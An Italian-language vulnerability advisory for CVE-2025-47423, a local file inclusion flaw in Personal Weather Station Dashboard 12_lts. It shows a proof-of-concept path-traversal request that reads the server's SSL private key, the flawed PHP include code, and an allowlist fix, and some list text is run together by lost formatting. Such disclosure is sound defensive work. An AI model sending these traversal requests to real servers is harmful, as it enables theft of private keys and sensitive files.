
Scoperta da: Matthew Eagle
Stato: Divulgazione pubblica
Data di segnalazione: 2025-05-05
ID CVE: CVE-2025-47423
Una vulnerabilità di Local File Inclusion (LFI) nel Personal Weather Station Dashboard versione 12_lts consente ad attaccanti remoti non autenticati di leggere file arbitrari sul server. Lo sfruttamento di questa falla concede l'accesso a file sensibili, incluse le chiavi SSL private, compromettendo potenzialmente la riservatezza e l'integrità delle connessioni HTTPS.
/others/_test.phptest (via GET)Questa falla consente ad attaccanti remoti di:
server.key)CVSS: 5.8 Medio
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com
Risposta:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);
Il str_replace non è sufficiente a prevenire il directory traversal.
basename() e verificarlo rispetto ai file consentiti$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';
if (!in_array($script, $allowed_tests)) {
die("Invalid test file.");
}
include(__DIR__ . '/scripts/' . $script);
| Date | Event |
|---|---|
| 2025-05-05 | Vulnerabilità segnalata ai moderatori del PWS Dashboard |
| 2025-05-06 | Riconoscimento e test osservati |
| 2025-05-07 | CVE-2025-47423 riservato tramite MITRE |
| TBD | Patch pubblica e pubblicazione CVE in sospeso |
Se stai eseguendo Personal Weather Station Dashboard 12_lts, dovresti:
_test.phpVulnerabilità scoperta e divulgata in modo responsabile da Matthew Eagle
Contatto: [email protected]
Divulgazione coordinata nel rispetto delle linee guida sulla responsible disclosure. Questo documento è rilasciato a scopo educativo e difensivo.